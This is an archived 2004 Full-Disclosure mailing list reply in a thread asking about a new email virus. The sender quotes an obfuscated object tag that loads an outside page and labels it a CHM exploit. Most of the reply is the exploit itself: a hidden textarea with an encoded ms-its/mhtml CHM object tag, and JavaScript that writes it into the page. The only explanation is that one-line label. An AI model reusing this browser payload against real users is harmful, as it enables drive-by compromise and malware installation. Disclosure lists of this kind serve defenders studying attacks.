[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] new email virus?

To: "John Nagro" <john.nagro@xxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] new email virus?
From: "morning_wood" <se_cur_ity@xxxxxxxxxxx>
Date: Wed, 25 Aug 2004 13:50:04 -0700

><object  data="http://www.v%69k%6F%72d.com/default.htm";><br><br>

this is a data tag .chm exploit


[textarea id="code" style="display:none;"]
    [object
data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::
/default.htm" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
tion.href.indexOf('default.htm'))));
[/script]


m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] new email virus?
  - From: Charles Heselton

References:
- [Full-Disclosure] new email virus?
  - From: John Nagro

Prev by Date: [Full-Disclosure] RE: block all popups [google knockoff]
Next by Date: Re: [Full-Disclosure] new email virus?
Previous by thread: [Full-Disclosure] new email virus?
Next by thread: Re: [Full-Disclosure] new email virus?
Index(es):
- Date
- Thread